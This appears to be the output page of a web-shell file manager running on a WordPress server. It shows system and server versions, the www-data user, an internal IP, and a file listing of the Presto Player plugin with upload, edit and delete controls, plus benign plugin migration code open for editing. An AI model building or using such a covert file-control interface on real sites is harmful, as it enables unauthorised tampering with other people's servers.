[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
presto-player
/
inc
/
Database
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 Upgrades
SET
[ DEL ]
📄 AudioPresets.php
2,516 B
SET
[ EDIT ]
|
[ DEL ]
📄 EmailCollection.php
1,594 B
SET
[ EDIT ]
|
[ DEL ]
📄 Migrations.php
1,424 B
SET
[ EDIT ]
|
[ DEL ]
📄 Presets.php
2,904 B
SET
[ EDIT ]
|
[ DEL ]
📄 Table.php
2,032 B
SET
[ EDIT ]
|
[ DEL ]
📄 Videos.php
1,480 B
SET
[ EDIT ]
|
[ DEL ]
📄 Visits.php
1,422 B
SET
[ EDIT ]
|
[ DEL ]
📄 Webhooks.php
1,298 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: Migrations.php
<?php namespace PrestoPlayer\Database; use PrestoPlayer\Database\Videos; use PrestoPlayer\Database\Visits; use PrestoPlayer\Database\Presets; use PrestoPlayer\Database\AudioPresets; use PrestoPlayer\Database\EmailCollection; use PrestoPlayer\Database\Upgrades\Upgrades; use PrestoPlayer\Database\Upgrades\PerformanceUpgrade; use PrestoPlayer\Services\RewriteRulesManager; class Migrations { public static function run() { // order of this one is important $performance = new PerformanceUpgrade(); $performance->migrate(); $visits = new Visits( new Table() ); $visits->install(); $presets = new Presets( new Table() ); $presets->install(); $audio_presets = new AudioPresets( new Table() ); $audio_presets->install(); $videos = new Videos( new Table() ); $videos->install(); $videos = new EmailCollection( new Table() ); $videos->install(); $audio_presets = new Webhooks( new Table() ); $audio_presets->install(); $upgrades = new Upgrades(); $upgrades->migrate(); $rewrite_rules_manager = new RewriteRulesManager(); $rewrite_rules_manager->bootstrap(); } public static function remove() { $visits = new Visits( new Table() ); $visits->uninstall(); $presets = new Presets( new Table() ); $presets->uninstall(); $audio_presets = new AudioPresets( new Table() ); $audio_presets->uninstall(); $videos = new Videos( new Table() ); $videos->uninstall(); } }